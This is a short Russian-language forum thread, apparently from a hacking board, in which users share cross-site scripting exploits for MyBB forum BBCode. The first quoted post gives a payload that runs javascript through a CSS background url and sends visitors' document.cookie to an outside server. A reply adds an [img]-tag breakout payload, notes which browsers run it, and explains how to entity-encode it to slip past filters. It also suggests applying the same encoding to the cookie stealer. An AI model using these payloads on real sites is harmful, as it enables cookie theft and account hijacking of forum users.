Сообщение от
Algol
Эксплоит
Код HTML:
[url=" style=`background:url(javaS cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
javascript через табуляцию
Проверялось в форуме
http://mybboard.com/community/А зачем тебе обратный слеш \; ?
Кстати если написать вот так,
Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');
То будет работать во всех трех браузерах, Опера, Фаерфокс и ИЕ. Но так как Фаерфокс имеет автоматическую защиту, то алерт выскочит только в ИЕ и Опере.
Строку,
background:url('javascript:alert(/wj/)');
Нужно закодировать Юникодом UTF-8 используя эту ссылку.
http://ha.ckers.org/xss.html
Там где говориться
Так как произойдет фильтрация.
Будет это все выглядеть типа вот так,
Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');
Только после каждого символа, теперь надо поставить точку с запятой. (
;)
Код для воровки кук, можно взять от Алгола и так же его закодировать.
